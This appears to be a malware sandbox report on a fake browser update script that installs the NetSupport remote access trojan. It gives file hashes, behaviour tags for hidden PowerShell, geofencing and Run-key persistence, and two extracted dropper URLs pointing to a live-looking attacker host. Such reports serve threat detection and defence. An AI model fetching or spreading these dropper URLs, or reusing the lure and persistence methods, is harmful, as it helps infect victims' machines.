Overview

overview

10

Static

static

1

Update 124...158.js

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Update - 114749.zip

  • Size

    5.3MB

  • Sample

    240611-ye2r4ayfnh

  • MD5

    6a92dd19374f69cc5ba125e4c14c09af

  • SHA1

    0cbf69ddea3ec5552dc664642e7e273073ec257b

  • SHA256

    4cf69758cb191de3edc2030019c3bb0c56346de4e85b6badcce9aba8a23706fa

  • SHA512

    f31a0d45b143f3d691e8da9652aee60d374afad61af567cd968c9d6263b26e7fa2bb26ce5f1162b8f426036f3c987eaa4f37e961b8c615a6b1831790ac209b7d

  • SSDEEP

    98304:5+jXXUiXX0GOe1HhX+IZB1+RjwGqas04lQ7OZj5NuEP9rzm3xMHIzX+C/:I7UfjMlfB1GqZ04laAj5PzyW2OC/

Score
10/10
netsupportexecutionpersistencerat

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://psk777.casa/help.php?12698
exe.dropper

http://psk777.casa/help.php?12698

Targets

    • Target

      Update 124.0.6367.158.js

    • Size

      22.7MB

    • MD5

      fcfee72585f617db2f7e7c8dbb17ea87

    • SHA1

      6b2021195a6f6a90b137c67dcafec262c478b4bf

    • SHA256

      b12c6d411ff605497092f9d712f16a0e1948caeca5ca37587f22dce756a2f2b7

    • SHA512

      0cfc4f400ea2651b0fe11218e282b13b4d74eeb1419f25a3eda0da2002a644f0adf4eaf12631b462ddab3c471e9062afe7fbf15b361377d53c66de7d9bab9e4e

    • SSDEEP

      49152:paZYOjByI+BJ8V6tlBDBFvLBLtmpf+T2vPHr+Z3jb4WsjcqTbsPF5xhyMa81qId9:7

    Score
    10/10
    netsupportexecutionpersistencerat

    • NetSupport

      NetSupport is a remote access tool sold as a legitimate system administration software.

      ratnetsupport

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence
    behavioral1

MITRE ATT&CK Enterprise v15

Tasks